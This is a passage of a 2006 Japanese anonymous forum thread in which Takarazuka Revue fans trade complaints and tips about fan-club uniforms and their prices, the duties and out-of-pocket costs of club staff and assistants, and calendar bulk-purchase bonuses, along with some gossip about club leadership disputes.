タニはその人のこと大好きでものすごく大事にしているってことだよね?
なんで?そもそもどういう知り合い?

264 :名無しさん@花束いっぱい。:2006/12/14(木) 00:02:35 ID:GEtBoPAc
>>262
禿同!!

265 :名無しさん@花束いっぱい。:2006/12/14(木) 00:04:55 ID:am0wVw2g
>260
自分も不思議に思ってました。
会服が黒なのはご自由にvですが、会服脱いでも黒い集団なのは
何故だったんだろう?
本当にいつもチケ出しが黒い固まりだった。

266 :名無しさん@花束いっぱい。:2006/12/14(木) 00:10:49 ID:feK5Vljt
パレードで闇に紛れるようにでしょたに会の会服。

黒だからってなんで叩いているのかイマイチ理由がわからないんだけど

267 :名無しさん@花束いっぱい。:2006/12/14(木) 00:10:58 ID:VYw+wNq3
>262
代表が機会を作ってくれなかったり、生徒が面倒で嫌がる場合もあるからね。
ほんと会で違うよね。
スタッフ、アシをやるなら何も無いと思って引き受けたほうがいいよ。

268 :名無しさん@花束いっぱい。:2006/12/14(木) 00:24:00 ID:nwh4C8Xd
>>266
会服はどうでもいいけど、
脱いでも黒なのは明らかに指示が出てるからジャネ?
二番手会しかも次期トップ闇に隠れる必要はないと思う
みちこ会なんて蛍光オレンジだぞw

269 :名無しさん@花束いっぱい。:2006/12/14(木) 00:34:53 ID:SubAXdGW
谷会は基本会服黒だから…
みっちゃんは絶対オレンジだし。
月出身って、テーマカラーでもきめてるの?
って思った私は宙ファン

270 :名無しさん@花束いっぱい。:2006/12/14(木) 00:38:21 ID:vw34LD3X
皆不思議がってるだけなのに叩きと思う人がいることに驚き

271 :名無しさん@花束いっぱい。:2006/12/14(木) 00:38:46 ID:puBQ6Okv
スタッフになると、
・会の都合で観劇しなくてはいけなくなりお金がかかる
・時間を拘束されるためバイトも出来ずさらにお金がなくなる
・自会の代表及び上級生会のスタッフに偉そうにされることに耐えねばならない
・しんどいだけで美味しいことなんてほとんどないのに、会員からのやっかみに遭う
・まず、会活動を誰よりも頑張る優等生でなくてはならない
それはそれは大変ですよ。

272 :名無しさん@花束いっぱい。:2006/12/14(木) 03:00:20 ID:7iqTvMxW
スタッフになって美味しい事もある
一般会員から見ればね
けど美味しくないことも多い。
代償って感覚でなら耐えられた

273 :名無しさん@花束いっぱい。:2006/12/14(木) 04:12:31 ID:QsDyA6n7
>>263
タニさん会代表は、昔東京アートで声楽の先生をやってました。
因みに二期会の方だそうです。
by元生徒

274 :名無しさん@花束いっぱい。:2006/12/14(木) 09:28:24 ID:cB5A2wCH
タニさんの代表さんそんな立派な先生だったんですね。
通りで歌の上達が著しいと思ってました。
これからもタニさんの活躍が期待できます。

275 :名無しさん@花束いっぱい。:2006/12/14(木) 11:01:45 ID:1zHZa8jP
歌の上達が著しい……… ポカーン AA略。

276 :名無しさん@花束いっぱい。:2006/12/14(木) 13:47:09 ID:7ewYxmMQ
あくまで、本人比だから

277 :名無しさん@花束いっぱい。:2006/12/14(木) 16:20:46 ID:CMF69HJP
エルドラードのエトワールに比べたら上手くはなったwww

278 :名無しさん@花束いっぱい。:2006/12/14(木) 22:43:29 ID:8gl77TKK
>>277
涼さん こんなところでそんなことを・・・
(生徒に一問一答スレ参照)

279 :名無しさん@花束いっぱい。:2006/12/14(木) 23:42:46 ID:3z0HwIzi
>>269
月男の会だけど、ウェアの色は毎回違う。
それに、みっちゃん前公演はスカイブルーだったよ?

280 :名無しさん@花束いっぱい。:2006/12/15(金) 01:21:53 ID:gJIJwAB2
>>278
キモイ

281 :名無しさん@花束いっぱい。:2006/12/15(金) 10:20:02 ID:ByJKUe6/
そんなタニの会には残念ながら若い子は少ないね…
というか全数が少ないので…
他に比べて割合は一緒なのかも

282 :名無しさん@花束いっぱい。:2006/12/15(金) 11:57:52 ID:ZuKMQe7F
>>280
別にきもくないけど。
もしかしてその涼さん?

283 :名無しさん@花束いっぱい。:2006/12/15(金) 13:16:59 ID:ID3bIgFh
みっちゃんち、今回昔の会服引っ張り出してなかった?
オレンジの、レスキュー隊みたいなやつ。
毎回新しいのを買わせるのはもったいないからかな?
あれっておニューじゃないよね?
月時代も何公演か使ってなかった?

284 :名無しさん@花束いっぱい。:2006/12/15(金) 15:48:21 ID:F6VKwRTh
あのレスキューみたいなオレンジベストはりかさんのとき毎回みたぞ
長春から薔薇くらいまで

285 :名無しさん@花束いっぱい。:2006/12/15(金) 21:22:13 ID:BA+XO/d6
うちの会服いつもセンスが良いから、普段使いも出来て良いけど
やっぱりどんどんたまってくからねー。
できたら、他の公演時もリピって(リサイクル)ほしいなー。

286 :名無しさん@花束いっぱい。:2006/12/15(金) 21:51:55 ID:uwm3NpFp
そうそう。どんどん溜まっていくから、
冬用・春秋用・夏用と三種類くらいにして、ずっと使い回してほしい。
その方がすぐに誰のの会かも分かるからいいんじゃないの?
ただ、センス悪いので固定されたら悲劇だけどね。

287 :名無しさん@花束いっぱい。:2006/12/15(金) 23:02:36 ID:AvCPKHoE
最近、いかにも会服!って感じじゃなくて、
小物っぽかったりするから助かるけど、
それでも溜まっていくんだよね。
どうしたものか…と思う今日この頃。

288 :名無しさん@花束いっぱい。:2006/12/15(金) 23:24:11 ID:bDTACA8S
お役目ゴメンの会服、容赦なく捨ててる…。

289 :名無しさん@花束いっぱい。:2006/12/16(土) 13:06:23 ID:kP9otKA3
何で会服は毎公演作るんだろ?
少なくともムラ・東京は同じでいいだろ?
お金の無駄だと思うんだけどな…
そのお金で1回多く観劇した方が、
どう考えても生徒にも会員にもありがたいよ。

290 :名無しさん@花束いっぱい。:2006/12/16(土) 13:37:44 ID:VICWml9N
雪1会、楽のお取次の結果まだかしら〜
いつもだけど遅すぎ!
遠征組は間に合わんぜよ(泣)

291 :名無しさん@花束いっぱい。:2006/12/16(土) 13:59:24 ID:OzIOaAV9
>>289
ムラ・東京で同じだったらだいぶ違うよね。
というか、2年に1回くらい新調でもいいと思ったりもする。
そしたら「あれは○○さんの会か」って覚えやすいしw

皆さんの所は会服いくら位?
私が入っている会は7〜8000円くらい。
ゆうに1回は観劇できる。


292 :名無しさん@花束いっぱい。:2006/12/16(土) 14:10:33 ID:kP9otKA3
>>291
でしょ?
なんで会員のほとんどの人が会服無駄じゃね?と思っているのに
FCはそのままのやり方を貫くのでしょうね?
ムラ・東京と会が別に存在しているのはわかるけど、
同じ公演、ましては同じ生徒を応援しているんだから
共有するものは共有していいと思う。

モノによって違うと思いますが…
冬場なんかによくジャケット・コートのようなモノを作ると思いますが
7〜8000円が相場でしょうね。
生地や形によって上は無限ですよw
マフラー系なら5000円くらいでしょうか。

293 :名無しさん@花束いっぱい。:2006/12/16(土) 14:51:32 ID:0HtmB8T+
会の収入源になると聞いたよ。
でも、下級生の、しかも少人数会ではたいした収入源にはならない気がするけどどうなんだろう。
それに組によっては小物禁止だったりと会員には無駄な出費にしかならないような。
トップ会さん思いきって改善してくれないかなー。

294 :名無しさん@花束いっぱい。:2006/12/16(土) 15:04:58 ID:2ivvIjxJ
ぼったくるために決まってるじゃん
仕入れ1500円くらいの通販の服にロゴ入れて8000円で売る。
半分は利益出てる

295 :名無しさん@花束いっぱい。:2006/12/16(土) 18:45:24 ID:qtayjE8g
アタシ、名前やロゴの上から飾りやワッペン縫い付けたりして隠すとか、丈や形を変えてリフォームして、着るヨ

296 :名無しさん@花束いっぱい。:2006/12/16(土) 21:03:19 ID:e2BImmN0
みっちゃんとこのは新調だよ。
宙移動記念で本人がデザインに参加したらすぃ。
バウとか特別な公演でないかぎりは当分アレらしく、
友達が「コートの上にアレをどう着ろと?!」と嘆いてたw

297 :名無しさん@花束いっぱい。:2006/12/17(日) 11:05:38 ID:+RAcIyip
共通にしてくれると予算的にはありがたいけど、
小物ならいいけど、夏も冬も使える服は難しいな。
東西共通だと、うちの場合はセンス極悪な西会で統一されると嫌だな。


298 :名無しさん@花束いっぱい。:2006/12/17(日) 14:23:24 ID:EGYG85JF
そういえば何で毎公演変えるんだろ・・・。
夏・冬で2種類くらいでずっと使ってもいい気がする。

私が昔入ってたとこは、小さい会で、若い会員さんが多いからということで、
できるだけ安くしようとしてくれてた。
夏はTシャツや木綿のペラペラのベスト、冬はフリースに生徒の名前刺繍とか。

299 :名無しさん@花束いっぱい。:2006/12/17(日) 14:34:07 ID:4vpKxGa1
>298
>できるだけ安くしようとしてくれてた。

いいなあ。
私のいる会も、(原価が)安い会服ってとこまでは同じだけどそれは利益を大きくするためだけ
仕入れ値を限界まで安く、売り値を限界まで高くして
なおかつ何パターンも作って必死に稼ごうとしてるよ・・・

300 :名無しさん@花束いっぱい。:2006/12/17(日) 17:30:59 ID:EiDS1FsG
小物も回数が重なると、それはそれで微妙。
会服がたまるよりはいいんだけどね。
小物でも6〜7000円は正直きついっす。

301 :名無しさん@花束いっぱい。:2006/12/17(日) 17:35:00 ID:pOi2o1yv
みっちゃんちの会服着こなしのヒント:
自分のコートの上にオレンジベスト、その上に半透明のカッパ。
(コンビニで売ってるやつ)たぶんスタッフさん。
会服も見えるし暖かいし、さすがトップ会だと…


302 :名無しさん@花束いっぱい。:2006/12/17(日) 18:57:17 ID:IQa4yHbW
会服って本人ノータッチなのが基本だよね??

303 :名無しさん@花束いっぱい。:2006/12/17(日) 22:04:00 ID:j7OkXHeG
ロゴや色は生徒が決めてるとこ多いよ。

304 :名無しさん@花束いっぱい。:2006/12/18(月) 12:43:44 ID:vqQqzOMi
>303
色はトプ会から順に決めるから本人の意向はそれほど反映されないんじゃないの?

305 :名無しさん@花束いっぱい。:2006/12/18(月) 13:52:34 ID:2XlEYo8d
みっちゃんとこって金持ちだね。宙移動記念で作ったのをしばらくつかうってことは、しばらく会服つくらないってことだよね〜。
新公の間も同じ服じゃなかった?

306 :名無しさん@花束いっぱい。:2006/12/18(月) 16:03:17 ID:FYj142rU
>>304
いくつか候補持って行って決めてもらったり、
ロゴのデザインを決めてもらったりはしますよ。

307 :名無しさん@花束いっぱい。:2006/12/18(月) 23:49:43 ID:To6FEQpo
100円のブレスレットを4000円で買わされるのと、
1000円のマフラーを6000円で買わされるのと、
1500円のセーターを8000円で買わされるのと、
2000円のジャケットを10000円で買わされるのと、
さあどれが一番心が和みますか?

308 :名無しさん@花束いっぱい。:2006/12/19(火) 09:34:07 ID:dQgkdoTM
(~-ω-~)??
モイラだったら1000エソのマフリャーを6000エソ??

他のはその原価だったら恐ろしい物になりそう…。


309 :名無しさん@花束いっぱい。:2006/12/19(火) 09:56:56 ID:pdDQXIOn
会によっては、原価がそこまで安くないようなものを会服にするところもありますよ。
それに、マフラーに6000円のところなんて、めったにないよ。
ほんとにそんな値段で買わされてるなら、それはぼったくりだね…

310 :名無しさん@花束いっぱい。:2006/12/19(火) 10:41:46 ID:KNW8Hryj
高い会服はデパートに発注したりもしているしね。
そう暴利をむさぼってるわけでもないよ。

311 :名無しさん@花束いっぱい。:2006/12/19(火) 11:17:29 ID:obVgq79X
うちは会服が○ニクロだったことがあるw

うちの会じゃガード終わったらすぐに会服脱いで散れって言われるんだけど、
他の組の人とか会服のまま日比谷界隈を歩いてるからビックリする。
組によって違うのかな?

312 :名無しさん@花束いっぱい。:2006/12/19(火) 11:20:37 ID:E/qeWU+q
>301
みっちゃんとこのカッパは会マーク入りだお
>304
生徒さんによっては形までかなり指定したりする。
色は順番だけど、だいたいいつも同じ色目だし。

313 :名無しさん@花束いっぱい。:2006/12/19(火) 13:39:42 ID:dQgkdoTM
ウチは、いつもユニク*です。
しかし嘆きません!庶民派には使い勝手がよく、会服として使い終わった後も部屋着として大活躍しています。ユニク*万歳!

314 :名無しさん@花束いっぱい。:2006/12/19(火) 20:03:14 ID:1M/D8m9t
宙1の東宝の会服気に入ってます

315 :名無しさん@花束いっぱい。:2006/12/19(火) 22:56:33 ID:ajkHw3M/
どんな服?

316 :名無しさん@花束いっぱい。:2006/12/19(火) 23:15:35 ID:1M/D8m9t
黒ベロアに金茶のファー付き
左胸に小さく金色英字で宙1の名前いり
ジャケット

317 :名無しさん@花束いっぱい。:2006/12/19(火) 23:22:33 ID:9SFq6VGE
>309
>それに、マフラーに6000円のところなんて、めったにないよ。
>ほんとにそんな値段で買わされてるなら、それはぼったくりだね…

はい、ぼったくられてます。
orz


318 :名無しさん@花束いっぱい。:2006/12/19(火) 23:24:32 ID:tq0PuFDP
>>317
('A`)人('A`)ナカマー…

319 :名無しさん@花束いっぱい。:2006/12/19(火) 23:28:09 ID:kMHx9FdN
>>318.319 スマン、ワロタ!w
ガンガレ!

320 :名無しさん@花束いっぱい。:2006/12/19(火) 23:29:32 ID:kMHx9FdN
レス番間違ったorz
>>317.318ですた…(恥)

321 :名無しさん@花束いっぱい。:2006/12/20(水) 02:37:27 ID:hNOQ29lH
高くても小物が好き…
多少ぼったくられても、小物だと得した気分にさえなるの…

お願いだから、小物にしてね。

322 :名無しさん@花束いっぱい。:2006/12/20(水) 09:51:07 ID:2AjT7EWt
>>317,318タソ
私は品不足でお断りされ難を逃れましたw

323 :名無しさん@花束いっぱい。:2006/12/20(水) 17:12:51 ID:L0NroHNK
317です

322タソが果てしなく自分と同じ会の会員な希ガス(゚∀。)

324 :名無しさん@花束いっぱい。:2006/12/20(水) 19:48:51 ID:Xxqsykk0
会服ウォッチ楽しいw
次回の月組公演が楽しみだ。

325 :名無しさん@花束いっぱい。:2006/12/21(木) 01:36:11 ID:oOOg0abZ
今の雪公演の会服が全然わかんないんだけど。

トプ会のが強烈すぎて…

コマが紺ベロアの上着なのはわかった。

326 :名無しさん@花束いっぱい。:2006/12/21(木) 02:04:05 ID:V5JTehm2
>325
茶毛のマフラーは水さん。(さすがにこれはわかるか。。)
オレンジがはいったニット系のマフラーはキム。
まーちゃんとこは紺のパーカー。
壮さんは紺系のマフラーかな?(これは自信ない。)


327 :名無しさん@花束いっぱい。:2006/12/21(木) 04:28:17 ID:U4bm1SPD
エリタンとこは三色使いのマフラー(白と紺と緑???)
ハマコは勿論黄色!のマフラー
ひろみちゃんは、紫のマフラー?

328 :名無しさん@花束いっぱい。:2006/12/21(木) 05:58:04 ID:hzFvWnNw
赤マフラー=舞風りら
銀のジャンバー=谷みずせ
黒のトレンチコート=凰稀かなめ
カーキーのジャンバー(背中に毒キノコ)=緒月遠麻
薄ピンクのジャンバー=晴華みどりダッタトオモ


329 :名無しさん@花束いっぱい。:2006/12/21(木) 05:59:05 ID:hzFvWnNw
赤マフラー=舞風りら
銀のジャンバー=谷みずせ
黒のトレンチコート=凰稀かなめ
カーキーのジャンバー(背中に毒キノコ)=緒月遠麻
薄ピンクのジャンバー=晴華みどりダッタトオモ


330 :名無しさん@花束いっぱい。:2006/12/21(木) 06:04:12 ID:hzFvWnNw
重複している上に間違えてる…。
赤マフラー=シナちゃん

逝ってきます…

331 :名無しさん@花束いっぱい。:2006/12/21(木) 17:46:32 ID:oOOg0abZ
赤まふらーシナか!!

ミズのとこのは普通にマダムは私服で使えそうだよね


332 :名無しさん@花束いっぱい。:2006/12/21(木) 21:22:56 ID:wfjR3ehx
どうやったらスタッフとかアシスタントになれる?

333 :名無しさん@花束いっぱい。:2006/12/21(木) 21:29:46 ID:xG7n0rOR
相性じゃない?嫌いな代表のスタなんか誰もやらねぇだろ。小規模ほどそうだよ。ちっちゃくまとまってるっていうか。

334 :名無しさん@花束いっぱい。:2006/12/21(木) 21:44:15 ID:wfjR3ehx
確かにそうだ。そもそもスタッフとアシスタントのちがいって何?

335 :名無しさん@花束いっぱい。:2006/12/21(木) 21:52:48 ID:xG7n0rOR
スタ不在の時の補助要員だろ。

336 :名無しさん@花束いっぱい。:2006/12/21(木) 21:57:09 ID:UxnlfEYZ
ジャンバーて・・・・・・・
ジャンパーでしょJumper

337 :名無しさん@花束いっぱい。:2006/12/21(木) 22:16:21 ID:hP9/ccut
スタッフ…代表を補佐しながら会を運営していくのに必要な仕事をこなしていく。
代表がいない時、生徒への差し入れ等代表の変わりをする。
一般ファンをまとめる。


アシスタント…スタッフの補佐的人員。
お茶会や入り出等は一般ファンと同じ扱い。
スタッフや代表が無理を言いやすい存在なので理不尽なことが多いかも?

某スタークラスのアシスタントをしてる友人を見て感じた違いです。

大きいところほどアシスタントは大変かも…

338 :名無しさん@花束いっぱい。:2006/12/21(木) 22:55:57 ID:xG7n0rOR
大きいとこ?俺の思う大規模とはズン会ですからぁ。ズン会スタは感じいい。

339 :名無しさん@花束いっぱい。:2006/12/21(木) 23:30:24 ID:uCd/XCf+
スタッフは、登録してる人。
アシスタントはしてない人、じゃないの?
だからチケット出しの時、
スタッフは会場前に劇場に入れるけど、
アシは入れないから、ガラスの扉を開けるくらいしか出来ない・・・
ように見えたけど。

340 :名無しさん@花束いっぱい。:2006/12/22(金) 00:57:58 ID:1w9YMuQe
アシでも入れるけど…。
登録ってどこにするの?

341 :名無しさん@花束いっぱい。:2006/12/22(金) 09:28:58 ID:aTxyjV7q
質問。月のまさき会って西はミ○○キさんで変わってませんよね?
メール問い合わせしても返事が一ヶ月来ない…(泣)

342 :名無しさん@花束いっぱい。:2006/12/22(金) 09:45:43 ID:aTxyjV7q
上げてしまった!
すみません…

343 :名無しさん@花束いっぱい。:2006/12/22(金) 09:48:26 ID:k+q4MHSF
342はわざとらし…



344 :名無しさん@花束いっぱい。:2006/12/22(金) 12:51:39 ID:rU46YRyX
小規模だから人数いらないだけでしょ…

アシ・スタッフになれるタイプっていうのは、遡れば散々ガイシュツ。
なりたいそぶりを見せず、入り出にまめに通えばそのうち声がかかるかもよ。
でもそんなにいいもんじゃないよ…

345 :名無しさん@花束いっぱい。:2006/12/22(金) 13:13:02 ID:S2EBYamr
>>340 ふつーに考えて劇団でしょ。

346 :名無しさん@花束いっぱい。:2006/12/22(金) 13:38:01 ID:Mj7b0gpU
代表とお付きの違いは? お付きのが下だよね?


347 :名無しさん@花束いっぱい。:2006/12/22(金) 14:12:16 ID:S2EBYamr
初心者スレのテンプレにそういったこと書いてなかったっけ?

348 :名無しさん@花束いっぱい。:2006/12/22(金) 15:07:19 ID:YbV7tiLW
書いてある。

>★代表、お付き、スタッフ
>代表とは会を仕切っている人のことです。 生徒のマネージャー業務などもかねています。
>代表の手伝いをしたり、会員のお世話する人のことをスタッフと呼びます。
>会がない生徒の場合は代表ではなくお付きと呼びます。

349 :名無しさん@花束いっぱい。:2006/12/22(金) 15:13:48 ID:1R1FSxCG
これ少し違うね。
わけるために便宜上使ってるというか格差をつけるために勝手に創作してる部分があるw
実際は以前東宝だけは上級生に限って付き人を入れることができ楽屋の世話をしていた。
そのひとたちをお付きと呼んでたわけで。
実際いまでも外の世界じゃお付きって言うしね。

350 :名無しさん@花束いっぱい。:2006/12/22(金) 16:05:51 ID:k+q4MHSF
昔のことやら、外の世界のことはどうでもよくない?
今現在のシステムで、代表、お付き、スタッフ、アシスタントが
どういう風な存在を示すか、が解ればいいんだし。

351 :名無しさん@花束いっぱい。:2006/12/22(金) 20:57:55 ID:YbV7tiLW
>>349
今の使い分けは>>348であってると思いますよ?

352 :名無しさん@花束いっぱい。:2006/12/22(金) 21:59:00 ID:DuYwAJJB
>>349
なかづき(中付き)だね。
懐かしいって響き〜。


353 :352:2006/12/22(金) 22:01:18 ID:DuYwAJJB
あ、入力ミス。
懐かしい響き〜 と書きたかった。
逝ってくる。

354 :名無しさん@花束いっぱい。:2006/12/22(金) 23:01:04 ID:NT+GHf5g
なぜスタッフやアシやりたがる人多いのでしょう?実際おいしいところってある?例えば生徒と会員より会う機会多いとか、好きな席で観劇できるとか。

355 :名無しさん@花束いっぱい。:2006/12/22(金) 23:03:44 ID:NT+GHf5g
あげた、すまん。

356 :名無しさん@花束いっぱい。:2006/12/22(金) 23:16:37 ID:IUhIt0Sx
はっきり言ってアシに美味しい部分なんてほとんどないぞ!

逆に1番スタッフが無理を言いやすい人間だから下手したら一般会員よりも最悪な状況も…

357 :名無しさん@花束いっぱい。:2006/12/22(金) 23:19:16 ID:s4+FmSO7
チュミマチェン、スタッフや代表ってただで見れるん? (?_?)

358 :名無しさん@花束いっぱい。:2006/12/22(金) 23:46:33 ID:d+tUfAvo
見れない

359 :名無しさん@花束いっぱい。:2006/12/22(金) 23:48:23 ID:6cvJzsHd
>357
それは会による。
とりあえず私は毎回払ってます。

360 :名無しさん@花束いっぱい。:2006/12/23(土) 00:02:18 ID:fxDOXh60
>>357
卒業した生徒のスタッフやってたとき、空席の多い公演の座席うめに
スタッフが連日借り出されましたが自腹でした。ムラだけでも○○万。

361 :名無しさん@花束いっぱい。:2006/12/23(土) 00:39:55 ID:slsRdxPy
うん
自分もムラ会スタッフしてましたがチケ代は自腹っすよ
仕事(カメラガード)だって自腹やったもんなぁ…

362 :名無しさん@花束いっぱい。:2006/12/23(土) 00:45:56 ID:mbN2BVjg
代表はチケ代生徒さんに払うん?

363 :名無しさん@花束いっぱい。:2006/12/23(土) 00:46:09 ID:ArS5qJoN
スタッフしてました。
会計管理は代表がしていたので代表がどうしていたからは知りませんがスタッフは自腹でした。
うちの会は打ち上げもなかったし、席もファンより後ろでしたので美味しいことは何もなかったですね。
ファンからスタッフに上がったので、生徒とお話できたり握手できるファンが逆に羨ましかったです。

364 :名無しさん@花束いっぱい。:2006/12/23(土) 00:48:22 ID:mbN2BVjg
生徒さんに小遣いもらえるん?

365 :名無しさん@花束いっぱい。:2006/12/23(土) 01:26:06 ID:/SxucMQ8
もらえるどころか…
席埋めチケット代、初日楽の花代加えて
生徒に差し入れる弁当・朝食やポットの飲物代
化粧前に事務所家賃などまでスタッフ・アシまでで頭割りして集金されてたよ。
代表がお客様に頼りたくないって言うからさ…

366 :名無しさん@花束いっぱい。:2006/12/23(土) 01:29:21 ID:FekWogO6
この子、噂の糞じゃなくて?

367 :名無しさん@花束いっぱい。:2006/12/23(土) 01:30:29 ID:FekWogO6
糞だったよ。確認してきたよ。

368 :名無しさん@花束いっぱい。:2006/12/23(土) 04:28:33 ID:IR/3q148
流れブタ切りで
皆さんとこのカレンダーセット買いの特典ってどんなのですか?
うちは会員の名前とサイン入り、
それ以上は○枚につき写真1枚だったけど
カードやお礼状のボツ写真みたいなのばっかりで萎えた…
大口の会員にはどうか知らんが…

369 :名無しさん@花束いっぱい。:2006/12/23(土) 10:33:03 ID:OjvW0hXU
私もカレンダーについての質問!
みなさんのとこの特典がつくまとめ買いて何本からですか?
パソカレ30本とか引いたんですがそんなもんなんでしょうか

370 :名無しさん@花束いっぱい。:2006/12/23(土) 12:01:24 ID:mbN2BVjg
ヅカカレンダーって実用性ないからいらない。数字が小さいから離れると見えないし、ミニカレンダーは立掛ける紙が、すぐダメになって倒れる。だから要らないです。

371 :名無しさん@花束いっぱい。:2006/12/23(土) 12:06:06 ID:mbN2BVjg
ミニカレンダーの月入れ替えが面倒。 スケジュール書く欄入りがいいよ。でもそれじゃステーショナリーになっちゃう。

372 :名無しさん@花束いっぱい。:2006/12/23(土) 22:44:47 ID:Hh0Zxq1L
パソカレ○十冊とその他カレ数冊ずつのセットで
特典はFC作成のカレンダー
写真とポストカード1枚ずつ
パソカレ1冊(だけ)に会員の名前とサイン入り
その他カレにはサインなしというのケチくさい

373 :名無しさん@花束いっぱい。:2006/12/24(日) 00:30:44 ID:ZqzLO2z4
『*冊以上で購入分全てにサイン入り』という、マイ所属会。
*冊買って、飾る用・保存用の2冊以外はどうしたらいいんだろう。
単価も安いし、*冊買うのは構わないんだけど(折角ならサイン欲しいし)
配るような友達は居ないし、共同で買う友達も居ないし、そんなに要らないw
全部にサインが入るとなると、捨てるのも抵抗があるんだよね。
サイン入り適用分の代金は払うから、2冊だけ送ってくれないものか…

374 :名無しさん@花束いっぱい。:2006/12/24(日) 04:03:34 ID:0aQgOKaX
サイン有り難いかもしれんが、シワがいってると台無し。俺的にはポスカサイズのカレで充分。その代わりパソカで。1000円ぐらいでどうかな。過ぎた月はポスカとして使う。資源の事もあるし。

375 :名無しさん@花束いっぱい。:2006/12/24(日) 11:24:23 ID:HEerwJ7z
何冊買ったらサインって、今時はどこもそうなの?
5年くらい前にお茶会に行った生徒さんのとこは、1冊からでも直筆サイン入りだった。
非会員だけど、つられて買いました。

376 :名無しさん@花束いっぱい。:2006/12/24(日) 15:43:59 ID:DN2Qt5tR
ここのスレ読んでると、スタッフでも平会員でも会って非常にしんどそうに思えるのですが
非路線、脇役や管理職の生徒さん、専科の方の会などでもそんな感じなのですか?
チケットが何枚はけるかとか、お茶会人数などはこういった方は関係ない?

377 :名無しさん@花束いっぱい。:2006/12/24(日) 17:22:09 ID:dT3vvhX+
非路線・脇役・下級生・上級生・管理職
立場なんて関係ないよ、全ては代表次第。

378 :名無しさん@花束いっぱい。:2006/12/24(日) 23:24:39 ID:LHomboTG
>>376
宝塚を純粋に楽しむには、こういうスレは見ないほうがいいと思うw
私はスタッフやってたけど、ここで時々愚痴りながらも、
そりゃあ達成感だって、楽しいこと(オイシイことではないですよ)だってありました。

379 :名無しさん@花束いっぱい。:2006/12/25(月) 01:22:33 ID:2CPlUYjs
五年前くらい前に何となく流れでスタッフ候補になり手伝いをしたけど公演終了後にはズタボロに。
あらためて代表からスタッフ登録するからと言われて丁重に断ったらかなりキレられた。
もう私はファンすら出来ないのかとへこんでたら、東会が発足、可愛がってくれてたお姉さんファンが代表に。生徒の信頼を勝ち得た東代表が西を退任に追いやり、私も一年ぶりにファン復活させて貰った。
ファン仲間もお帰りって言ってくれて、今は楽しく一般ファンしてます。生徒も「大変な事に巻き込んでゴメンね」と言ってくれた。涙が出た。
同じように一度退会して復活したスタッフいますか?

380 :名無しさん@花束いっぱい。:2006/12/25(月) 04:03:02 ID:I3UsENyz
>>379
退任に追いやりって…コワッ。
西代表もたいがいだったんだろうけど、
東代表もたいがいだね〜。

381 :名無しさん@花束いっぱい。:2006/12/25(月) 08:54:07 ID:LZwrFHHL
いるのよね〜こういうの。
ちょこっと手伝ってペラペラ喋るのが…。
あなた向いてないからスタッフ辞めて正解ね。

382 :名無しさん@花束いっぱい。:2006/12/25(月) 10:59:30 ID:z7CZmplN
それが真実だとしたら、この狭い世界のことだから、
もう379が誰か特定されてるんだろうねw

383 :名無しさん@花束いっぱい。:2006/12/25(月) 11:57:37 ID:0udyLoKJ
>379
100%身バレしたねw

ところで、なんで生徒が謝ってるの?
生徒に事情が筒抜けになるくらいgdgdな会なのか
それとも、生徒の信頼を勝ち得たという新代表が、前代表の悪評を生徒に吹き込んだ
実はDQNだったのか・・・他に考えられる事情はなんだろう。

384 :名無しさん@花束いっぱい。:2006/12/25(月) 12:30:04 ID:zN5gkzmc
自分から言ったんでしょ?
私こんな目にあいました(;_;)ってね。
そりゃ生徒もそういうしかないじゃん。

385 :名無しさん@花束いっぱい。:2006/12/25(月) 23:49:28 ID:HMfbmrAr
ちょっと手伝ってからやっぱできませ〜ん
自分だけ悲劇のヒロインぶってウザ

386 :名無しさん@花束いっぱい。:2006/12/26(火) 15:56:16 ID:D92JNHCh
>>379の人気に嫉妬

387 :名無しさん@花束いっぱい。:2006/12/26(火) 23:26:49 ID:/4Nc6vv7
生徒があやまったって・・・もしかしたら追いやった代表が立ち回りうまくて
西を蹴落としたかもしれない。まじめで一生懸命やる人が結構自分を売り込む
のが下手でってこともよくある話。
現実を読めないジェンヌ・・読めなくて当たり前だと思う。

388 :名無しさん@花束いっぱい。:2006/12/26(火) 23:49:22 ID:1wWsJ4ej
生徒の信頼を勝ち得た、って辺りがね。
逆を返せば、代表を蹴落としたと読まれる世界だからね。

389 :名無しさん@花束いっぱい。:2006/12/27(水) 17:34:24 ID:mlq+uOKn
西が悪かったか東が悪かったか、どっちでもありそうな話だわw
両方悪いってこともあるしね。
私が知ってる、今はもう退団しちゃった生徒の会は、最初の代表が雲隠れしちゃったよ。
会のお金も持ったままでね。

390 :名無しさん@花束いっぱい。:2006/12/29(金) 22:26:03 ID:rDh8HPA7
S会金返せ

391 :名無しさん@花束いっぱい。:2006/12/29(金) 23:03:27 ID:g+n0aOCw
カレンダー特典…はじめてパーソナルがでた時は3部買ったら1部にサイン(名前は無し)だったかな。
今は5部から特典(写真)ありで10部+その他カレンダー少々でサイン(名前なし)+特典。
あとは5部〜10部単位で増えていって、名前入りとかカレンダーの別アングル写真etc特典も増える。
東と西でセット内容が違うからどちらに頼むか毎回悩む…

392 :名無しさん@花束いっぱい。:2006/12/29(金) 23:21:04 ID:T/bW4XeN
特典に写真あるんだ〜いいな。

うちのとこは名前入りサインのみだ…

393 :名無しさん@花束いっぱい。:2006/12/29(金) 23:46:23 ID:kUnhBD5C
FCに入ると大変ですね。
特典があっても5部も10部も同じものはいらない私はいつまでも一般です。

394 :名無しさん@花束いっぱい。:2006/12/30(土) 01:37:54 ID:712xRzLx
>393
知ってて言ってると思うけど、FC入ってるからって必ず買わなきゃいけない
訳じゃない。私はそんなにいらないからFCでは買わない。キャトルで売れる
事も大切でしょうと自分に言い訳してるけど


395 :名無しさん@花束いっぱい。:2006/12/30(土) 03:26:54 ID:kR9kU2Cz
カレンダーって何部買っても、劇団の懐にお金がいくんでしょ?
それとも歩合で本人にも儲け有なの?
単に、これだけ捌けるという人気のバロメータ−的な物なのかなぁ

396 :名無しさん@花束いっぱい。:2006/12/30(土) 12:37:55 ID:LJ4wV7vv
FCは3割引で劇団からおりるんだけど。

397 :名無しさん@花束いっぱい。:2006/12/30(土) 13:15:03 ID:p1STzE6a
だったら自分はFCで買うなぁ。
どっちかっていうと劇団よりも会に貢献したいし。
良席が欲しいとかじゃなくてね。

398 :名無しさん@花束いっぱい。:2006/12/30(土) 13:39:27 ID:uOvP2WVB
>396
3割引はカレンダーのみ?

399 :名無しさん@花束いっぱい。:2006/12/30(土) 22:25:20 ID:9BkP26tD
代表と生徒でデキてそうなのいるよね。元●1もそれっぽかった。実際どうなんだろう??

400 :名無しさん@花束いっぱい。:2006/12/30(土) 22:50:51 ID:AaXyen4Z
400

